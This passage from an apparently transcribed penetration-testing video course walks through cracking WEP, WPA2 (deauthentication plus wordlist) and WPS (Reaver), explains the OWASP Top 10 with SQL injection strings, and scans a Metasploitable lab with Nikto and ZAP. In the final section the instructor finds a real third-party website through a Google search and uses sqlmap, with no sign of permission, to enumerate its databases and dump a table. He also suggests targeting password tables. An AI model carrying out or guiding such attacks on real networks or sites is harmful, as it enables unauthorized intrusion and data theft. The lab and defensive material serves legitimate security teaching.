Kali machine, you'll see that session has been created for this target machine and this has been compromised. Again, you have a Meterpreter session here that you can use to interact remotely with this compromised target. And here you go. This is a screenshot for the compromised target. So, happy hunting. Moving on to this chapter about how to attack modern wireless networks, we will discuss several things: the web protocol, WPA, WPA2 and WPA3, WPS, and we will discuss as well different tools. Several standards actually exist to allow the interaction between different Wi-Fi devices or wireless enabled devices. The most famous standard is the IEEE 802.11 with its various specifications like the A, B, G, and M. Actually, this standard doesn't specify anything related to security. From here, researchers have to come up with extensions and develop extensions in order to allow the establishment of certain security mechanisms. And actually, these extensions are called WEP, WPA, WPA2, and recently WPA3 has been approved since the beginning of 2018. Security in a network where no physical security exists is really a big issue, and you are exposed to different kind of attacks such as man-in-the-middle attack. Someone can capture your session and redirect you to somewhere else. So it's really important to know about wireless security. A quick comparison between WEP WPA and WPA2. As you can see the names, WEP was introduced in the 90s, while WPA2 in 2004 and then WPA 2005. The cipher is RC4 for WEP and WPA, and it's the enhanced AES for WPA2. So as you can see, WPA2 is currently the most secure security extension. The key size varies from 40 bits in WEP to 128 bits in WPA and WPA2, and the key is static in WEP, so for that it's prone, much susceptible to attacks, while the encryption key changes uniquely in WPA and WPA2. WPS, when we say WPS, it's actually Wi-Fi protected setup. So you can see here on the screen, some routers are enabled with this WPS hardware button, and you can as well enable it in some of the routers from the setup itself, from the application itself. If you can go here, this is my router here. If you can go to wireless, the WPS, you can click on it to disable WPS and remove it to enable it. What does this button actually do? Well, this button enables you to access your router in a fast way, so you don't have to go to the extensions web WPA and WPA2. Actually, if you have WPS enabled, it will not work on the web extension enabled routers. So once web is enabled, WPS is disabled by default. So it actually works on WPA, mostly WPA2 routers. So it's about WPS, it has 8-digit pins, and it allows you to connect in a fast way to your router. So again, this is a weakness here. If you were able to crack the WPS pin, you can have access to the router regardless of the password there or the common phrase used. So even if you change the common phrase on WPA, you can still run some applications in Kali that we will see later on in the chapter, that it can recover the password in a means of seconds, not even minutes. So this is again an important thing to know about wireless router. The tools that we'll be using for the attacks are listed here. So actually, any of these tools can perform WPA, WPA2 web, and WPS attacks. For the sake of exposing you to different tools, I'll be using a different tool for each kind of attack. So for the WPA2 attack, we will use these applications, Airmon, AirDump, and AirReplay. So Airmon actually, it puts the wireless card, your wireless card, into monitoring mode. So it will monitor what's going on around you. The AirDump will actually save the traffic that's going on around you to a PCAP file. And the AirReplay will enable you to inject some packets into this traffic. We will see this into details. For the web attack, we will be using a tool called Fern Wi-Fi. It's a simple tool where it can crack and recover the web keys. So we'll do this into details as well. And as for the WPS hacking, we will use an application called Reaver. Doing some wireless attacks, especially that we're using the virtual Kali image on VMware. So I faced some issues actually using the virtual machine, because by default, the virtual machine Kali doesn't have access to my built-in network card. As you can see here, there is no connectivity to the wireless network. So I had to get an external Wi-Fi, USB Wi-Fi adapter and connect it. And you can actually connect it as well from this menu here. It's a TP-Link wireless USB adapter. Just press connect and you will be able to have a Wi-Fi connection here. So after plugging the USB wireless card, you should be able to see the connection from here. Or you go to the terminal and issue the command airmon-ng and you'll be able to see the interface here. Actually, I've removed the card now, but what I've done is that because I've faced issues using the external wireless card, I've created a live Kali bootable USB. From there, you can actually boot your laptop from this USB disk and have access directly to the internal wireless card without going through the hassle of having an external wireless card, etc., because it was giving some errors. And it's easy to do that actually. You just go to the Internet Explorer or Chrome here and go to the Kali download page and just go there and download the relevant image that you have, and then go to SourceForge and download this application Win32 Disk Imager. Download this application here and open it from the desktop. It's a very simple application. You just select the image that you've downloaded here and then select the USB drive and then press write. It will create a bootable USB disk with Kali image on. Make sure to change the sequence of boot on your laptop, and here we go, you can boot directly from Kali. It's important as well to know before going ahead with the actual examples here that Wi-Fi uses a 4-way handshake as opposed to the trivial 3-way handshake we've seen earlier. Going into the details of how this handshake is established is beyond this course, But it's important to know this as a prerequisite. There's a four-way handshake being established or being negotiated before the connection is established. Now we'll see how to crack a WEP network. And for this purpose, I'll be using an application called Fern. You can access it under the wireless attacks menu, and then where is Fern? This is Fern Wi-Fi. Web attacks are really very simple and easy. You just need to press a button and the application will do the rest. So on this interface, just select your wireless LAN network here and you press this button to scan for access points. It now detected 1 access point with web enabled and 30 access points using the WPA. So now we are going to press on this button and see that the access point here name is MAJO, and you just select this access point and press on Wi-Fi attack. So that's it, and the application will actually do the rest. And if you see this progress bar here, it's collecting IVs, and then IV actually it's 24-bit field sent in the clear text portion of a message over WE. So, and this is a 24-bit text. It is used to initialize the key stream generated by the RC4 algorithm. You don't have to worry about that. It's just like collecting these IVs, and after it have collected around more than 10,000 IVs, it will try to crack into the password, and you'll get the password shown below. Okay, now so I will show you how to crack a WPA2 network. You first go to terminal and issue this command, ermon-ng. So it will list the wireless interfaces you currently have on your computer. The interface here is wireless LAN 0. So what we need to do is to let this interface listens to the wireless network's connections around us. We need to enable that by using the same command, ermon-ng start. So start monitoring on this interface, WLAN 0. So now it enabled that, but we have some errors here. We have 2 processes that we need to kill in order to continue with our attack. So use kill and then kill 112. So now if you issue the same command again, you'll see that the interface now name has changed from WLAN 0 to WLAN 0 mon. So now our interface is in monitoring mode. The next thing, we need to capture the traffic of the wireless networks around us and dump this traffic in a file. The command to go for is erdump-ng. Then we need to specify the interface name, which is WLAN 0 mon. So now we will be able to see all the traffic around us in this form. The BSS ID is the MAC address of access point or Wi-Fi. The CH here represents the channel and where the connection is running on. The encryption here says it's mostly, or it's WPA2 for all. And this is the name of the hotspot or name of the connection. So I'll do this attack on my network, which is MAJO. I just need to press Ctrl+C to stop that. So now we have this information related to the connection or the spot that I need to attack. Next thing is to dig more deep and see who are the stations that are associated with this access point. So the next command to do is erdump. So now we will write this information into a file. So use the command erdump-ng, then the W parameter, which specifies the file name that we need to run or to capture the traffic to. Let's name it attack1. And then for the channel, which is channel 5, and then BSSID, paste it here, and to specify the interface. So currently only 2 stations are associated with my hotspot here. This is the MAC address of the station, and this is of course the MAC address of the hotspot. So now the cap file is capturing the traffic, everything, but in order for us to do the attack, we need one key thing. We need to capture a handshake. So if we don't capture a handshake, we'll not be able to attack. So we have 2 options here. Either you do this manually since we are testing on our local spot here. So you disconnect one of these stations and reconnect again, and you will be able to capture a handshake. Or we inject a deauthentication packet so that the client will authenticate again and we'll be able to capture the handshake. To do that, you have to go to a new terminal. Make sure to keep that running. So go to a new terminal and issue this command, which is airplay. We use this command to inject packets. -0 is for deauthentication. And specify here the number of packets that you need to send, maybe 10 packets. Then -A, which is the source MAC, which is the MAC of the hotspot. And then we need to send these packets to the station, let's say this station. And then we specify our interface. And here you go. The WPA handshake should appear here, hopefully. Great. And we were able to get a WPA handshake here. So we can close this now and we can stop this here by doing Ctrl+C. So now we got a handshake, we got a cap file that has a handshake, and the next thing to do is to crack into this Wi-Fi network. We use the command aircrackng, and -W stands for a word list. So the thing here is that WPA networks, WPA2 networks are very strong, and we cannot just crack them by trial and error like we do for example in web. So we need to use word list, and depending on if you have a strong word list, you'll be able to crack this hotspot better. If you have a weak word list, you'll not be able to crack that. So let's see here. Let's try to get a word list. So for the sake of this example, just try to see a word list on my computer here. So maybe, I don't know, let's use this word list for example. Okay, let's open it in the leafpad command. Here you'll be able to see, maybe this is not the right file to go for another file, maybe this one. So leafpad and then open the file, and you'll be able to see, this is a small file actually, but the aircrack will go through all these passwords and try them. So let's continue with issuing this aircrack command. So the W stands for the word list. I can just drag it from here. Make sure to remove colons. So this is the word list that I'll be using. Then -B is for the BSS ID. Copy it again. Then we need to use the cap file that we already captured. Again, you just drag it and make sure to clean the path and the file name. We're just ready. You just press enter, and here you go. Was found, and you were able to crack into this Wi-Fi network. So before we cracked web access point, and we also cracked WPA2 access point. And as you realized, we were able to get a handshake cracking WPA2 access point and run it against a word list. So it depends on the strength of your word list. Sometimes the passwords will have upper characters, special characters, numbers, etc. And it can take you years to crack an access point. So the WPS cracking is a guaranteed cracking, and it only works against routers that are not locked. So what you're actually doing is cracking an 8-digit pins, and you can do it step by step. You can crack the first 4 digits, and then you can crack the remaining 3 digits, and the last digit is a checksum digit that is easily calculated. So as you can see, if you want to crack the first 4 digits, the combination is 9 to the power 4, so it's like around 10,000, which is possible. And the good thing is, once you have this WPS pin, even if the victim changed their WPA2 password, running the Reaver again against the same access point with WPS pin will give you the current password or the changed password in a matter of seconds. So let's go directly and invoke this Reaver application. First of all, we can issue the command wash just wash. So it'll tell you what to do. There are lots of options here that I can leave for you to go through, but you can use wash -I and WLAN0mon. So it's important here to enable the monitoring mode on our network card. So as we did before, airmon-ng, it's already enabled in my case. So if you want to enable it again, so write airmon-ng start and then the WLAN0mon. So let's run wash -I WLAN0mon. It will show you it will show you actually all the neighboring access points. I'll stop it here with Control C. So it will show you all the neighboring access points. You will see the version of the WPS here and whether it's locked or not. Many of these access points do not have the WPS locked. Only mine. Since I've tried a couple of times, now it became locked and I'm not able to run Weaver against my access points, so actually it's a no-go once the WPS is locked. But I'll tell you how to perform this. So let's choose my access point. Suppose that the access point here is the WPS is not locked. So you go Weaver and just press enter. Again, lots of options here which are totally beneficial if you go through them one by one, but I'll use the default command. So Weaver -I to specify the interface, and then the access point here, MAC address of my access point, and run very verbose just to see what's going on. So just invoke the command, and if you want you can just leave it overnight. At the end of the day, Weaver will display WPS pin and will spit out the WPA2 password. So I'll stop that here at this point. So once this is done, it might take you a couple of hours, maybe a couple of days. Weaver will display the pin here, and under that it will display the WPA2 password, and you can try it to associate to the access point. Suppose that the victim changed this password. All you have to do is to run Weaver again with the same command here and just write P to specify the pin, then enter the pin, the 8-digit pin that you already got from the previous attack, and Weaver will just display the new password within a matter of seconds. As a conclusion, here are the 4 main tips on how to improve your wireless network security. First of all, as you've seen, cracking a web hotspot is really easy. It's all about time. So avoid using the web extension. Using WPA, but with a weak password, is easy to crack as well. So avoid using WPA. Always use WPA2 with a strong password, but disable WPS. This is very important because even if you use WPA2 with a strong password, cracking the WPS will render it unusable. So always disable the WPS. And of course, make sure not to have an open Wi-Fi network. Always protect it using WPA2 or the latest extension of security available. Web applications are hugely attractive to hackers for a million different reasons, especially when these web applications are mismanaged and unpatched. Thus, they become very easy target to attack. Security flaws at a high level can be not identifying security requirements upfront, and usually in this case, security comes as a complementary thing at the end of the project. This is a totally false practice. Creating designs which have logic errors, and this is usually the case and happens all the times. Using poor coding practices and not abiding by security benchmarks and best practices introduces technical vulnerabilities in the web application. Deploying the software improperly with maybe configuration errors and configuration mistakes will make your application prone to being hacked. And introducing flaws during maintenance or updating as well introduces lots of these flaws. So how bad is it? Actually, this slide is a summary of different reports from different sources such as Watchfire, Gartner, Trustwave, and it says that like 97% of web applications audited there by Watchfire are vulnerable. Gartner says that 75% of the attacks today are happening at the application level. So as you can see, the majority of the attacks and the vulnerabilities lie at the application level. What are the categories on websites or the categories of the malware that lie on the websites out there? Actually, you can see that Trojan horse malware dominates the area. It's like 70% of all the malwares there are Trojan horses. Next come the backdoor, then the viruses, then the adwares, and then the worms. Here is a list of the most popular CMS or the content management system on the web. So obviously it's clearly that WordPress is the internet #1 most popular CMS, and it is the #1 target for hackers. It is an easy target for hackers. WordPress hacking software is a lot out there, and during this course we will introduce one of the applications on Kali. On top of that, you realize that these popular CMS, they use PHP, so we can say that PHP as well dominates the internet. First appearing in 2003 and continuing with regular updates, the OWASP Top 10 is a compilation of the top 10 most critical application security risks and vulnerabilities, which is produced with the goal of empowering developers, security teams, IT people to ensure that the applications they're using and they build and have are secure against the most critical risks. Actually, the OWASP is now the de facto standard for web applications security. As application security threats are constantly evolving, the current OWASP Top 10 is the 2017 list on the right side here. This list includes detailed best practices for both the detection and remediation of the vulnerabilities. Building on the success of the previous OWASP Top 10, which is the 2013 version available on the left side, OWASP has produced further top 10 lists mainly for Internet of Things and mobile development security risks. The OWASP compilation is mainly done by examining both the occurrence rate and the overall severity of each of the threats. As you can see here, a couple of things changed from the 2013 version to the 2017 version. Two of the items, which are A4 and A7 from the 2013 version, insecure direct object reference and missing function level access control, were merged to one item in the 2017 list, which is the broken access control. A couple of items from the 2013 list didn't qualify to be in the 17 list, which are the cross-site request forgery and unvalidated redirects and forward. On top of that, we have a couple of new items in the new list, which are the XML external entities vulnerability. We have as well the insecure deserialization and the insufficient logging and monitoring. It is worth mentioning here that OWASP is not affiliated with any technology company, but it's an open community project dedicated to enabling organizations to develop, purchase, and maintain secure applications. I will now try to briefly explain each of the vulnerabilities in the updated 2017 list. The first item is injection. If your application is receiving user input that goes into the backend databases, then your application is vulnerable or can face code injection attacks. So injection flows are a set of security vulnerabilities which occur when suspicious data is inserted into the application, such as commands. Non-injection types are SQL, OS, and XXE, which is the XML external entities. As for the second vulnerability, which is the broken authentication, actually when an application functions are not implemented correctly, the attack surface is open for attackers to easily break in and compromise password, session IDs, etc. So sessions should be unique to each individual user, and without some necessary session management, an attacker can sneak and steal credentials and information. As for sensitive data exposure, as the name says, it occurs when security controls such as HTTPS are not implemented correctly, thus leaving a hole for attackers to steal sensitive information such as payment information, username, password, IDs, PII information, etc. XML external entities attack is a type of injection attack, and it happens when the application parses or takes XML input and parses them. The attack occurs when the XML input contains a reference to an external entity that is processed by a weak XML parser. So this attack will lead to different leakages such as disclosure of information, denial of service, and server-side request forgery. The broken access control is actually a result of merging the insecure direct object reference and missing function level access control. Access control is meant to control what's authorized users are allowed and are not allowed to do within a web application, and to establish proper access control. When this is not implemented correctly, attackers will exploit this to perform unauthorized tasks. Security configuration is the most commonly seen issue according to OWASP. So strong security requires good and secure practices of configuring applications, frameworks, servers, databases, etc. Cross-site scripting is the most famous one on the list in my opinion, and it allows attackers to inject client-side scripts into public-facing web pages. Insecure deserialization. So serialization is the process of turning some object into a data format that can be restored later. So users actually serialize objects in order to save them to storage or to send as part of communications. Deserialization is taking data structured from some format and rebuilding it to an object. Using components with known vulnerabilities is actually when you use libraries, frameworks, and in your application from open source community, and in many cases these libraries and frameworks are vulnerable, thus will lure your application to be vulnerable as well. The last one, and according to OWASP, insufficient logging and monitoring coupled with missing or ineffective integration with incident response will allow attackers to further attack your system and actually maintain persistent attack or persistent access to your system in order to tamper, extract, and destroy data. The Metasploitable virtual machine is an intentionally vulnerable version of the Ubuntu Linux. It is designed for testing your security skills in terms of penetration testing and ethical hacking. It is available as a VMware image. You can go to the Rapid7 website or GitHub and download the VM from there. I did that and imported the VM to my player here. And once the machine starts, you'll be presented by this console. You just have to type the msfadmin as a username and msfadmin as a password, and then write ifconfig to see the IP address of this machine. In this case, it is 211.139 here. Now we will go to our browser here and type this IP address, and we will be presented by a list of web applications like TWiki, PHPMyAdmin, Multidie, DVWA, which is the damn vulnerable web application, and WebDAV. All of these are deliberately vulnerable web applications which come pre-installed in the Metasploitable 2 image. To access any of these applications, just press on them, and here we go. This is the Multidie web application. It contains all of the vulnerabilities from the OWASP top 10 plus a number of other vulnerabilities inspired by the damn vulnerable web application. Multidie allows the user to change the security level. You can toggle the security from here. As you can see now, the security level is 0. Once you press it, now it's 1, now it's 5. If the application is damaged by the user injection and hacks, just click here on the reset DB and you will reset the application to the original state. You can test your skills on the OWASP top 10 by clicking on this left menu here, and all the top vulnerabilities are presented. As for the damn vulnerable web application, just use the username of admin and password. Then you will be presented by the homepage, which has enough instruction. The damn vulnerable web application is a PHP MySQL web application that is actually, as its name says, it's damn vulnerable. Again, the main goal of that is to aid you in testing your skills for penetration testing and ethical hack. You can as well toggle the security from here, from low, medium, high, and you can test the top security vulnerabilities from this left menu as well. Whenever a user input is required, it can either be in a text box, username, password field, feedback fields, comment fields, etc., there's a risk that an injection attack can occur. Injection flows, and particularly SQL injections, are common in most web applications. It happens when the attacker puts data or injects data to trick the interpreter into executing unintended commands, thus by modifying, changing, or even deleting data from the database itself. This way, the attacker will have full control of the back end from just inputting a couple of queries from the front end. What can be injected? We can inject SQL queries, which is the most famous type of injection, PHP queries, LDAP queries, and operating system queries, which will make calls to the operating system functions itself. Any web application that relies on the use of an interpreter has the potential to fall victim to this type of flow. This is a simple example how an SQL injection attack takes place. Suppose that we have a text box where a user ID is required and then a search button. The usual SQL query behind that is select star from users where user ID equal the text that is fetched from the text box itself. Now suppose that instead of a user ID we just put 105 colon semicolon drop table learner. So what will the SQL query turn into? It will be select star from users where user ID equal 1 of fine. This will be executed, and the other query that will be executed is drop table learners. You will delete the learners table. Another example that you can use is put 105 or 1 equal 1. As you know, 1 equal 1 is always true. So the query will turn into select star from users where user ID equal 105 or 1 equal 1. This query is true, so it will return all users. Now, how to protect ourselves from such kind of injection? Well, we need to design and review our code appropriately. We need to do input sanitization to make sure that no malicious code hits the backend. We need to use safe APIs, and we always need to run commands in minimal privileges so that the drop table command that we've seen earlier wouldn't be executed if the account being used is a normal user. Broken authentication occurs when the application mismanages session-related information such that the user's identity will be compromised. Before deep diving, we need to talk about what is a session first and what is a session ID, then how HTTP and session ID are, or how does HTTP handle session ID. First, a session ID is unique to each user. It is used for only one authenticated session. It is generated by the server and sent to the client in many forms, such as hidden variable, it can be a cookie, or a URL query string. And the user is expected to send the same ID upon the next request. Now, how does HTTP handle session IDs? Unfortunately, HTTP and HTTPS protocols, they do not provide tracking of user session. So typically, vendors will provide a built-in session tracking methodology, or developers will develop their own approach to handle sessions. Thus, a room for error can occur. Attackers will take advantage of such bad session management practices to compromise password, keys, or authentication tokens. The aim here is to either get into someone else's session or use a session which has been ended by the user to steal session-related information. The session is guessed. This is especially useful if the session at hand is for a privileged account. Some examples on how to steal sessions are pressing the backward button after logout to see if you can still view the previous page and access the session itself. You can try to hit the URL directly after logging out to check if you're able to access the page. Check for the presence of session-related information in the URL, because sometimes developers pass such information in get URL strings. And you can as well try to find some credentials in the source code itself by right-clicking on the page and view source. Sometimes Coders, they just hard code credentials for ease of access. We can protect ourselves from broken authentication attacks using various ways, such as using long and complex random session IDs that cannot be guessed. It is always recommended to use HTTPS to prevent disclosure of session IDs using various man-in-the-middle type of attacks. Always use secure cookies. Make sure the session is timed out on the server. Consider regenerating a new session upon successful authentication or privilege level change. A URL query string should not be used for session IDs because this is easily disclosable. And always use, or whenever possible, use multi-factor authentication. Attackers can sniff or modify the sensitive data if not handled securely by the application. Unfortunately, applications can unintentionally leak important information about their configuration, internal workings, or private data. Attackers will use this weakness to steal sensitive information and conduct serious attacks. A few examples include the use of weak encryption keys. As seen here on the screen, a victim and a web server communicate over a channel in where the victim sends encoded data, which is base 64 data, to the server, and any attacker sniffing the session will be able to capture this data and easily convert it to a readable format. So weak crypto algorithms, which are used over HTTP channels, even HTTPS channels, are susceptible to attacks and give out our sensitive data. Another example is to impersonate the session ID as well. An attacker sniffing the channel will be able to acquire the session ID and use it to impersonate the victim and present himself as the victim to the server. Some of the countermeasures are to prevent displaying internal error messages to the end users, such as stack traces, database names, table names, or even protocols used. Encrypt all data in transit and data at rest. Use secure protocols and algorithms, and disable caching of responses with sensitive data. An application is vulnerable to XXE attacks if it enables users to upload a malicious XML file which further exploits the vulnerable code or dependencies. This can be used to execute code, steal data, and perform other malicious tasks. If a web page enables the users to upload an XML file that can be processed or parsed for the data, then the user will be able to submit this file, which will in turn call important local files such as the password file under the etc directory, and will be able to display the content of this file. Some countermeasures to this attack include the implementation of whitelisting approaches at the server side to prevent XML files upload, the usage of WAF, Web Application Firewall, to detect and block XXE attacks, code reviews, and it's recommended never to use serialization of sensitive data at the client side. Broken access control occurs if a user is able to access unauthorized resources directly without proper authentication. Unauthorized resources can be web pages, databases, and directories. Applications have various account types depending on the users, such as admin, operators, reporting, group, etc. One common problem is that developers restrict access to these accounts on the UI side and neglect putting the same restrictions on the server side. If exploited, an attacker can easily have admin rights. In order to protect ourselves from broken access control, it is always important to invalidate tokens and cookies after logout, forced login logout after a password change, and secure resources on the server itself and not only from the UI interface. Developers and IT staff usually ensure functionality in favor of security. Configurations done at the application level, server level, and other devices need to be in line with the security requirements. Most of the security requirements get missed unless identified by hackers. Example of these security misconfigurations are directory listing, which is available on many of the websites, default error messages, default passwords, weak passwords, default scripts, etc. Let us see an example here of an error that has been thrown to a user on a web server. It obviously tells us that this application is using Microsoft Access. Another example obviously tells us that the application is using Oracle database. Some of the tips on how to protect ourselves from security misconfigurations is to always follow a hardening process for both hardware and applications. Ensure that default settings such as default passwords are changed. Only install the required features and frameworks on a server and make it a habit to review the security of your configurations at regular intervals. Cross-site scripting is a web application vulnerability that permits an attacker to inject code, typically HTML or JavaScript, into the content of an outside website. When a victim views an infected page on this website, the injected code will automatically execute on the victim's browser. Thus, the attacker will be able to steal private information from the victim associated with the website. So here the point is that the victim trusts the web application, which is a legitimate web application, but it's a vulnerable one, and the attacker will inject this malicious code in order to exploit this trust. We have two types, or mainly two types of cross-site scripting: reflected, which is known to be non-persistent, and stored, which is known to be persistent. The reflected one actually occurs when a malicious script is reflected off a web application to the victim's browser. So the person here, or the vulnerability actually takes place on the web browser and not on the application itself. The application is only vulnerable. The script is activated through a link which sends a request to a website with a vulnerability that enables the execution of a malicious script. The vulnerability is typically a result of incoming requests not being sufficiently sanitized by the website, which allows for the manipulation of web applications functions and the activation of a malicious script. So here the issue is in the vulnerability of the website, which allows an attacker to exploit this in order to execute external scripts on the victim's browser. To distribute the malicious link, the perpetrator typically embeds it into an email or a third-party website, such as comments on some of the social media sections. The link is embedded inside an anchor text that provokes the user to click on it. Once the click happens, the attack is executed, or we call it, it reflects off to the user. The second type is the stored attack or stored cross-site scripting. It's known to be persistent, and it is more damaging than the reflected one because it occurs when a malicious script is injected permanently into a vulnerable web application. This injection takes place when there is a place to write, when there is a place for user input, such as wikis or such as comments in the discussion forums. The impact of cross-site scripting is moderate for the reflected one, but severe for the stored type. In Kali, we have many automated tools that can help us find cross-site scripting problems automatically in our web applications. Let's take an example here for a reflected XSS attack. First, the attacker will send an evil email to the victim after identifying that this domain is vulnerable to cross-site scripting. So this is a legitimate domain, but he attached a JavaScript file to it using this link. The victim receives this link through email, and once he presses on the link, the vulnerable bank application takes the data and includes it in a valid web page. Now the victim browser trusts the script from this domain, and the attacker has full access to the victim's account. The next type of attack is the stored one, where the perpetrator discovers a website that has a vulnerability and will inject the script directly into the website or into the database through the front end. Next, the perpetrator injects, as we said, the script directly. Now, for each visit to the website, the malicious script is activated automatically, maybe on load, and the attacker will have access to the session cookies of the visitor. Now, how to protect ourselves from these types of attacks? The most important thing is to use frameworks that automatically escape the cross-site scripting by design, such as using the latest .NET framework, the latest Ruby on Rails, the latest React.js, etc. It is also recommended to filter and sanitize input as much as possible. It is also recommended to filter output or encode output in order to escape the characters that might be used for cross-site scripting by using base64 encoding, for example. And it's advisable to enable the content security policy, which is a defense in depth mitigating control against cross-site scripting. Some of the applications save data on the client side by using serialized objects. These applications rely on the client to maintain the state, but they will allow the tampering of serialized data. An example can be this cookie, which is a user normal cookie stored on a computer, can be altered by just changing the role from user to admin, and thus an escalation for the privilege will take place. The only way to protect against insecure deserialization attacks is to encrypt the serialized data. If any components with known vulnerabilities are used by the application, this may lead to security breaches, even server takeover. The components can be coding frameworks, libraries, and vulnerable functions. Some of the examples can be the use of a vulnerable PHP version, the use of an outdated kernel version, unpatched Windows Server, and vulnerable jQuery version. In order to protect ourselves from these vulnerabilities, make sure to establish and follow a regular patching process, and make sure to subscribe to relevant security forums to keep you updated with the latest CVEs and relevant fixes. With all the countermeasures in place, attacks still happen, and that gets noticed only after an incident has happened. It is said that on average, an attack takes 200 days to be discovered. If undetected, the attacker could have compromised the system long back and gained persistence. To ensure the malicious intent of the attacker gets noticed, it is essential to log and monitor all the activities. It is essential to log all the activity and monitor it for any suspicious behavior. Some of the examples of insufficient logging can be unnoticing many failed login attempts from a particular source, too many requests from a particular source at an extremely fast, low fixed rate, junk traffic, spikes in pattern of traffics, and extensive DNS queries. because DNS is the only legitimate port along with HTTP and HTTPS that connects corporations to outside world, and attackers have found lots of ways to bypass firewall controls by injecting queries or malicious queries within the legitimate DNS query. So it's always important to monitor the spikes within the DNS traffic. How to protect ourselves? Easy. Always monitor the usage, the logging of your applications, network monitoring. Effective security incident and response procedure should be in place and should be tested. Few other checkpoints can be used to develop a benchmark for the application security. You need to check against cross-site request forgery, which is actually a common type of attack that tricks web browsers into executing unwanted actions in an application in which a user is legitimately logged into. Another thing that you need to check against is remote file inclusion, where you need to restrict the upload of malicious extension of files such as exe, PHP, JavaScript, and even XML files, as we've seen earlier. The perpetrator's goal is to exploit the referencing functions in an application to upload their malware, which can be a backdoor that will totally compromise the server and steal your information. Make sure as well to check against clickjacking, which is a malicious practice of manipulating a website user's activity by concealing hyperlinks under legitimate clickable content. Thereby, the attacker will force the user to perform actions that they are unaware of. Nick2 is an open source web server scanner which performs comprehensive tests against multiple vulnerabilities, including dangerous files, outdated versions, and mainly the OWASP top 10 vulnerabilities. It's very wise to start scanning a website before performing any penetration tests on it. So let's get to the bread and butter of that. Just open your Kali terminal here and write nick2 hyphen uppercase H. You can see the help menu here. So some of the important switches that we will use is the format and the tuning. For the tuning, you can tune your scan to perform tests against these vulnerabilities, including SQL injections, file upload, information disclosure, and etc. Now, if you go to your web server, to your web browser, I have installed Metasploitable 2 on this IP here. It's just a virtual machine, contains various web applications, for example, damn vulnerable web application. I will issue my nick2 command against this web server. So nick2 hash or dash h, which means host, and then just put the IP of the server. And then press enter. As you can see, it starts giving us some information about the server. The website is hosted on Apache and using Ubuntu Linux server. And here are some of the vulnerabilities that are included on the server, such as the cross-site scripting protection header is not defined, X content type options header is not set, and etc. As well, there are some OSVDB, which is open source vulnerability database, which is similar to the common vulnerability and common vulnerability exposure, CVEs. You can just look them up on the internet and it will tell you exactly what type of vulnerability is that. Although that it mentions here the vulnerability at a high level. So this is one of the tests. It includes lots of options. So if you want to feel comfortable, just export it, put dash output, and then specify the file name. I'll put nick2 here, and then dash format. Make sure to put the F uppercase, and then HTML. Just press enter. It will create the file. It will output the same result in an HTML format. If you open it here, just right click on this file and open in Firefox, and you'll be able to see the report in an HTML format. This is very important, especially if you're a penetration tester. It's very important to document all the work that you do. Here it tells you the target IP, the target host name, the port. We can change the port by issuing the -p switch and just put any port, but by default it's 80. The server is running Apache version 2.2.8 on Ubuntu, and you can see all the vulnerabilities here with the description and the link to the OSVDB entries. It's a very handy report. Now going back again to NIC2, as we saw once we issued this -h, is that we can tune our scan for different purposes. Like if you want to scan specifically for SQL injections, we need to use the parameter 9. So let me show you how. Suppose that we don't want to output, so NIC2 -h, then the IP, then use -tuning, then the number 9. It will specifically scan this website against the SQL injection attack, and you can see the results. Now you can as well use HTTP in the host name / and then specifically mention the application name, which is the damn vulnerable web application. So now it will scan against SQL injection attacks on the damn vulnerable web application. So as you can see, it's a very handy tool, and it's a very easy to use tool, and it's considered somehow a standard for web vulnerability scanning. Another easy to use penetration testing tool for finding vulnerabilities in web application is the ZAP OWASP. It's easy to invoke it. Just go to applications, then web applications analysis, and click on OWASP ZAP. Just follow the instructions on the screen to start the application. Actually, it's a very easy tool to use. Just you have to enter the IP address of the web server or the web application here, and just press on attack. So let's try that. Just hit on attack, and as you can see here, this is the same metasploitable box that we are testing. It will run through the whole list of URLs and will eventually display the list of vulnerabilities here under alerts on the left side, and will categorize them by the vulnerability type. As you can see, these are increasing here. We have application error disclosure, frame option header not set. It will categorize them based on the color as well. So these ones in yellow are low in priority. Just you can see it here. It's low, and it will describe the vulnerability. It will give you the solution for that, and will give you some web references as well. You can as well go to the medium rated vulnerabilities. Click on that. This is medium. The same thing goes in description, solution, and references. It's a very easy and a handy tool to use. Let's stop that here. Now let me tell you about some advanced features of this tool. You can select an application, for example, this damn vulnerable web application, and click on the session properties. You can go down here and select the authentication method in case you want to provide the username and password. You can put username and password here. You can select the URL from here. It will pop up the parameters automatically. Just make sure to select username here and password here. For the users, just need to add the user of the website in order to authenticate. So I'll put admin and just write admin and password, which is the default credentials for that, and just have to press OK. Make sure that session management is cookie based, and which is the default. Press OK, and then right click on that and perform the attack again. Just start the scan, and it will list as well the vulnerabilities under the alerts tab in a categorized manner. SQL Map automates the process of detecting and exploiting SQL injection flows in websites, and it will allow you to take over the database server. It comes with a very powerful detection engine with a broad range of switches that can be from database fingerprinting, accessing the underlying file system, and executing a lot of commands. If you open the web browser here and go to Google, just type PHP ID = 1. This is known as the PHP ID vulnerability. It will mainly list a set of websites that use this vulnerability here. They might possibly be vulnerable and possibly not. So I'll take the first website here, which is Contemporary Romanian Writers. Just click on that. As you can see, it uses the ID = 1. If you want to know if the website is vulnerable, just go to the URL here and add this apostrophe after the 1 and just press enter. It will pop up this error message. You can just copy that without the apostrophe, of course. Just copy that link and go to your console and issue the SQL map command. You can use the -h to get the list of switches that you can use, but we'll go directly into executing the command. So SQL map, you can use -u for the URL. Just paste the URL here and then space --dbs. This command will try to get the list of databases that lie behind this website. Just press enter and wait for the magic. As you can see here, the database available are 2, Information Schema and Romanian SVC. So we're interested in this Romanian SVC here. The other command we should issue is remove this DBS, just use -d and specify the database Romanian _SVC and then use -tables. So the -tables will fetch all the tables that are in the Romanian _SVC database. Press enter. As you can see here, this is the list of tables in this database. So we're interested in getting the content or the columns of the table named, for example, RA_autori. So add that and then -- columns. It will display all the columns in the table RA_autori under the database Romanian SVC. And here we go. This is the schema design of this table here. It has like a couple of columns that we can dump to our local computer. So just get back the previous command and remove these columns, use -c uppercase, and then you can select the column names like NUME, then NUME_ND, POSA, Prenum, etc. And then use space -- dump. It's retrieving the list or the content of this table, as you can see on the screen, with all the relevant information in it. Pretty impressive, right? This is the table, the content of the table, as you can see here, and the dump actually is now on our PC. The dump was downloaded to our computer under this path here. So if you want to see it, just copy this link and let's try to open a new window here. Just use LeafPad, then paste, press enter, and here you go. This table doesn't contain like confidential information. It's just for tutorial reasons. And some of the websites might be vulnerable and you might be interested in targeting tables that have usernames and passwords. Some of the vulnerable websites have their passwords hashed. So SQL Map can decrypt these hashes for you automatically. Sometimes SQL map will not be able to crack the passwords, so you can use other application or tools like John the Ripper to do that. Let's take another example here. Let's close this again, open that 